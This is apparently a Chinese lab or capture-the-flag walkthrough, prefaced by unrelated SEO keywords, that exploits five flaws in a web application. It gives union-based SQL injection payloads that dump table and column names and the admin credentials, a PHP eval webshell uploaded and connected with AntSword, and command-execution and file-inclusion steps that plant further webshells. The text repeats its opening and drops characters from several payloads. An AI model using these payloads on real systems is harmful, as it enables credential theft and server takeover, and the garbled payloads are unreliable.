国内设计师个人网站欣赏,河北项目建设备案网站,网络推广竞价外包,更改网站描述寻找漏洞
一#xff0c;我们打开页面 第一个漏洞
xss漏洞
1.在登录页面显示有弹窗 第二个漏洞
sql注入漏洞
1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点 2.查看数据库表名
-1 union select 1,database(),3# 3.查看表名
-1 union select 1,2,group…寻找漏洞
一我们打开页面 第一个漏洞
xss漏洞
1.在登录页面显示有弹窗 第二个漏洞
sql注入漏洞
1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点 2.查看数据库表名
-1 union select 1,database(),3# 3.查看表名
-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schematest# 4.查看admin中的列名
-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schematest and table_nameadmin# 5.查看账号密码
-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin# 6.成功登录进来 第三个漏洞
文件上传漏洞
1.我们登录进去往下滑有个上传文件我们上传一个1.php
?php eval($_POST[cmd]);? 2.用蚁剑连接一下 第四个漏洞
命令执行漏洞
1.页面下方有一个执行框输入ls查看 2.输入echo ?php phpinfo();? wff.php 访问wff.php 3.写入一句话木马访问1.php
echo ?php eval($_POST[cmd]);? 1.php 4.蚁剑连接 第五个漏洞
文件包含漏洞
1.在关于页面中发现存在文件包含漏洞 2.通过访问之前写入的wff.php查看远程文件包含关闭本地文件可以访问 3.访问1.php 4.蚁剑连接